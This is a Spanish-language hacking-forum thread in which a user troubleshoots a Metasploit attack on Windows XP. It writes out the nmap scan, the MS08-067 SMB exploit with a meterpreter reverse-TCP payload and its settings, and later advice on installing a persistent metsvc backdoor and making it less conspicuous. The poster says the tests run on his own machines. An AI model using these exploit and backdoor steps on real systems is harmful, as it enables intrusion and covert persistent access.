elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ayuda con MSF
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con MSF  (Leído 7,140 veces)
CloudswX


Desconectado Desconectado

Mensajes: 806


"La física es el sistema operativo del Universo"


Ver Perfil
Ayuda con MSF
« en: 13 Febrero 2010, 23:45 pm »

Duda Metasploit.

Ok gente sere breve en mi duda:

Escaneo una IP con el Nmap....

Código:
PORT    STATE SERVICE      VERSION

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y....
Citar
msf> use windows/smb/ms08_067_netapi

Luego de esto elijo el PAYLOAD:
Código:
msf> use PAYLOAD windows/meterpreter/reverse_tcp

Introduzco todas las variables con el comando "set"...
Código:
set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

y finalmente
Código:
msf> exploit

El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error:

http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

Sera porque el host se queda con la sesion anterior del Meterpreter?
Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez   :-\


Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.


En línea



 «Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Ayuda con MSF
« Respuesta #1 en: 14 Febrero 2010, 00:09 am »

Tip para el MSF: Cuando consigues la session del Meterpreter, pulsando Ctrl + Z la pones a trabajar en segundo plano, despues si quieres volver a la session, bastará con correr el comando sessions -l, ver el ID de la session y despues para interactual con ella, ejecutas, sessions -i ID_Session.

Ahora con la duda que planteas, no entendí, porque no estas usando la misma IP? Como te sales de la consola del meterpreter?
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Ayuda con MSF
« Respuesta #2 en: 15 Febrero 2010, 14:27 pm »

Duda Metasploit.

Ok gente sere breve en mi duda:

Escaneo una IP con el Nmap....

Código:
PORT    STATE SERVICE      VERSION

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y....
Citar
msf> use windows/smb/ms08_067_netapi

Luego de esto elijo el PAYLOAD:
Código:
msf> use PAYLOAD windows/meterpreter/reverse_tcp

Introduzco todas las variables con el comando "set"...
Código:
set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

y finalmente
Código:
msf> exploit

El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error:

http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

Sera porque el host se queda con la sesion anterior del Meterpreter?
Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez   :-\


Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.




Incluso el exploit funcionando no obtendras una sesion, en LHOST estas poniendo una IP privada mientras que con RHOST estas atacando una IP Publica (200.xxx.xxx.xxx), si funciona el exploit en ese ordenador tratara de hacer una conexion contra la ip 192.168.xxx.xxx de su red privada si esa direccion existe, de lo contrario no hara nada.
En línea

CloudswX


Desconectado Desconectado

Mensajes: 806


"La física es el sistema operativo del Universo"


Ver Perfil
Re: Ayuda con MSF
« Respuesta #3 en: 15 Febrero 2010, 14:54 pm »

Pollo... Si te fijas en la imagen que esta en el link

NO ESTOY ATACANDO UNA IP PUBLICA

Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.

Es decir tengo una red LAN, donde uso Ip's privadas...  Si lo dices por esto:

set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

Solo lo hice para ilustrar un poco que el error no estaba en una variable pendeiente de SETEAR. No son las Ip's reales.

Mira esta imagen para que las veas:
http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

En línea



 «Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx
ruben_linux

Desconectado Desconectado

Mensajes: 138



Ver Perfil WWW
Re: Ayuda con MSF
« Respuesta #4 en: 18 Febrero 2011, 23:45 pm »

a mi parecer son son pocas las redes que caen en en este exploit.
esta anticuado, cualquier red del 2011 ya no tiene ese fallo
:-)
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Ayuda con MSF
« Respuesta #5 en: 19 Febrero 2011, 11:10 am »

Pollo... Si te fijas en la imagen que esta en el link

NO ESTOY ATACANDO UNA IP PUBLICA

Es decir tengo una red LAN, donde uso Ip's privadas...  Si lo dices por esto:

set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

Solo lo hice para ilustrar un poco que el error no estaba en una variable pendeiente de SETEAR. No son las Ip's reales.

Mira esta imagen para que las veas:
http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink


Fuese como fuese, pusiste IP privada y no puedes menospreciar a otros que han intentado ayudarte, ilustrando un posible problema, tal como lo has planteado.

Saludos
En línea

CloudswX


Desconectado Desconectado

Mensajes: 806


"La física es el sistema operativo del Universo"


Ver Perfil
Re: Ayuda con MSF
« Respuesta #6 en: 21 Marzo 2011, 02:01 am »

nunca menospreciare toda la ayuda que aqui he recibido, no ha sido esa mi intencion..
En línea



 «Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Ayuda con MSF
« Respuesta #7 en: 22 Marzo 2011, 18:14 pm »

nunca menospreciare toda la ayuda que aqui he recibido, no ha sido esa mi intencion..
Bueno, mirate algo acerda del METSVC si aún sigues interesado, para maneter una session persistencte a pesar de que reinicie el equipo, te salgas y tal.
 
Backdoreando el equipo remoto

Y conectandonos al backdoor tras su instalación en el equipo remoto.

Saludos
En línea

CloudswX


Desconectado Desconectado

Mensajes: 806


"La física es el sistema operativo del Universo"


Ver Perfil
Re: Ayuda con MSF
« Respuesta #8 en: 22 Marzo 2011, 19:49 pm »

Pues la verdad me parece muy util el BT de "metsvc" ya que como dices es un poco tedioso explotar la misma vulnerabilidad cada vez que queramos una shell remota. Pero el asunto de que cualquier otra persona con acceso al puerto podria utilizar mi backdoor es un factor a tomar en cuenta para los que hacemos pentest entre amigos.

y algo que me llamo la atencion y no se si se pueda modificar con las opciones dadas por 'çmetsvc  es esto:

Código:
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...

ya que este crea un directorio llamado VICTIM ? NO SERA MUY OBVIO  :huh:
En línea



 «Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Ayuda con MSF
« Respuesta #9 en: 22 Marzo 2011, 21:58 pm »

Pues la verdad me parece muy util el BT de "metsvc" ya que como dices es un poco tedioso explotar la misma vulnerabilidad cada vez que queramos una shell remota. Pero el asunto de que cualquier otra persona con acceso al puerto podria utilizar mi backdoor es un factor a tomar en cuenta para los que hacemos pentest entre amigos.

y algo que me llamo la atencion y no se si se pueda modificar con las opciones dadas por 'çmetsvc  es esto:

Código:
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...

ya que este crea un directorio llamado VICTIM ? NO SERA MUY OBVIO  :huh:
Mmm fíjate en los archivos source .rb de METSVC y fíjate si puede cambiar en alguna la ruta (haz una backup siempre por si acaso).

Saludos
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines